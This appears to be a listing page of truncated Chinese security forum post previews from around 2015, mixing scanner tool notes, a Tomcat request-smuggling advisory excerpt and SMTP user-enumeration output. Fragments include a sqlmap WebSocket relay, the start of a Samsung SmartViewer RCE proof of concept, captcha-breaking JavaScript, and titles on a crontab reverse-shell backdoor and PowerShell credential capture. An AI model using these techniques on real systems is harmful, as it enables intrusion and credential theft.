关于真假iPhone5s的辨别方法？ Huc-Unis (专看漏洞号) | 2015-03-23 11:52 现在越来越多的iPhone5、5c改5s、旧5s直接组装成新5s。 在网络上也看了一

Linux系统时间重启后变化原因 时间：2010-07-14 11:33 关键词：linux centos red hat 脚本图形 1. 系统时间变化原因分析 Linux的时间有两种，一

如何打造运行在U盘上的操作系统。 江南的鱼 | 2015-03-24 12:09 设计目的：防止查水表！ 虽然有U盘启动的windows ce系统，但是系统很多功能却是用不了，如何

WebSocket 中转注入工具(for SQL Injection tools: sqlmap, etc.) Ricter (๑`･ᴗ･´๑) | 2015-03-22 23:55 https://github.com/RicterZ/websocket-injection Installation git clone https://github.com/RicterZ/websocket-injection cd websocket-injection pip install -r requirements.txt Usage python main.py --port=8888 python sqlmap.py -u "http://localhost:8888/?url=[target]&data=[sqli]" -p data MIT 各种求 star ~ [原文地址]

六度触发式的Stuffing提纯色情网站的垃圾流量 混世魔王 (百度一下 "混世魔王") | 2015-03-19 00:45 垃圾流量，是最容易获得的。但是，正是因为叫垃圾，所以

Masscan这个神器在一天之内两次登上Hacker News头条区。作者Robert David Graham号称这是世界上最快的扫描器，比大家耳熟能详

[分享]1.9亿域名A记录(主域名:1.18亿，子域名7300万) 园长 (分享) | 2015-03-16 17:44 最近社区里很多人在搞大数据分析，之前也有整理过一些数据但

Betster（又名PHP Betoffice）是一套用于创建基于PHP、MySQL和JavaScript的在线赌场软件。 Betster 1.0.4版本中存

雷叔 @ 2014.02.05 , 07:53 pm 号称不会被查水表的通信APP-Telegram 微信、QQ亦或者是Whatsapp，凡是人们日常生活中所用到的通信方式，人们所关

Author：scar1et Email：root@scar1et.org 0x01 前言 话说在某个风和日丽的早上，笔者像往日一样在校园小道上散步阅妹。

作者：Lupin @ 京东安全应急响应中心 日期：2015-3-3 ElasticSearch是一个JAVA开发的搜索分析引擎。2014年，曾经被曝

wyportmap目标端口+系统服务指纹识别组件 猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2015-02-05 20:19 * thorns_project (分布式异步队列系统) * wydomain (目标系统信

如何在网络上保护个人隐私？ 猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2014-12-25 15:48 简而言之我妈用百度直接搜到了我的知乎、乌云、微博、QQ 这件事太严

Message view « Date » · « Thread » Top « Date » · « Thread » From Mark Thomas <ma...@apache.org> Subject [SECURITY] CVE-2014-0227 Apache Tomcat Request Smuggling Date Mon, 09 Feb 2015 09:12:47 GMT -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2014-0227 Request Smuggling Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Apache Tomcat 8.0.0-RC1 to 8.0.8 - - Apache Tomcat 7.0.0 to 7.0.54 - - Apache

批量删除QQ微博之简易Java版 浮萍 | 2015-02-06 16:59 写了半天，发表的时候竟然出错了，然后不得不重新写一次。。。。 PS：以后发表前要先备份呀。 先上代码吧

thorns_project 分布式异步队列系统 猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2015-02-06 16:50 演示地址：http://thorns.wuyun.org:8080/w

探讨一下企业邮箱如何防范钓鱼邮件 her0ma | 2015-02-09 17:03 最近发现好多起针对公司员工的钓鱼邮件，我们目前的处理办法主要有以下几个方面： 1，发现之后及时发全员预

$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1 Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... VRFY Worker Processes ......... 5 Usernames file ........... users.txt Target count ............. 1 Username count ........... 47 Target TCP port .......... 25 Query timeout ............ 5 secs Relay Server ............. Not used ######## Scan started at Sun Jan 21 18:01:50 2007 ######### root@10.0.0.1: Exists bin@10.0.0.1: Exists daemon@10.0.0.1: Exists

关于无人机 7z1 | 2015-01-30 11:21 如果无人机上的系统应用调用WIFI万能钥匙数据接口，自动化获取gps地理位置连接WiFi，然后内网中间人攻击或者进行DNS

Nscan Nscan is a fast Network scanner optimized for internet-wide scanning purposes and inspired by Masscan and Zmap. It has it's own tiny TCP/IP stack and uses Raw sockets to send TCP SYN probes. It doesn't need to set SYN Cookies so it doesn't wastes time checking if a received packet is a result of it's own scan, that makes Nscan faster than other similar scanners. Nscan has a cool

Firefox 跟 Chrome支持WebRTC可以向STUN服务器请求，返回内外网IP，不同于XMLHttpRequest请求，STUN请求开发者工具当中

求科普：如何盗刷银行卡？ 鬼五 (万般努力，只为心中那个梦) | 2015-01-20 19:08 http://zone.wooyun.org/content/18156，看到

JS破解乌云验证码 p.z (谈钞票伤感情 谈感情又伤钞票又伤感情) | 2015-01-17 15:35 以后盲打乌云后台有验证码也不怕啦 (function(){ function decaptcha(image){ var canvas = document.createElement("canvas").getContext('2d'); var result = ''; var letter = [[],[],[],[]]; var letterArea = { '0': {'x1':14, 'x2':21,

一条命令实现无文件兼容性强的反弹后门 猪猪侠 (A) | 2015-01-25 20:15 最好用一个不常见的用户执行，任务写入/var/spool/cron/$username (crontab -l;echo

PolarSSL 未初始化内存导致远程命令执行 杀戮 (杂役) | 2015-01-20 17:00 0x00 简介 原文: https://www.certifiedsecure.com/polarssl-advisory/ 相关报道:http://threatpost.com/potential-co

Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution。 <html> <!-- Samsung SmartViewer BackupToAvi Remote Code Execution PoC PoC developed by Praveen Darshanam For more details refer http://darshanams.blogspot.com http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html Original Vulnerability Discovered by rgod Vulnerable: Samsung SmartViewer 3.0 Tested on Windows 7 Ultimate N SP1 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265 --> <object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object> <script > var payload_length = 15000; var arg1=1; var arg2=1; var

招手机应用工程师 具体要求： 1、精通安卓、iOS或Windows、Linux系统应用开发。 2、能独立逆向大型手机应用程序，并能独立逆向及分析通

玩转自制teensy实例--按钮控制 Anymous (听说集齐7枚wb能召唤神龙，兑换树莓派，点击右边感谢收集wb，召唤神龙！) | 2015-01-16 01:17 当有一个teensy

廉价Arduino山寨板制作teensy Anymous (听说集齐7枚wb能召唤神龙，兑换树莓派，点击右边感谢收集wb，召唤神龙！) | 2015-01-11 16:23 刚才花了半天时间

Powershell Popups + Capture 五道口杀气 | 2015-01-13 18:17 英文原文：Powershell Popups + Capture 这个方法优势就是可以不产生任何文件，可以获取任何权限用户的认证信息 不需要管理员权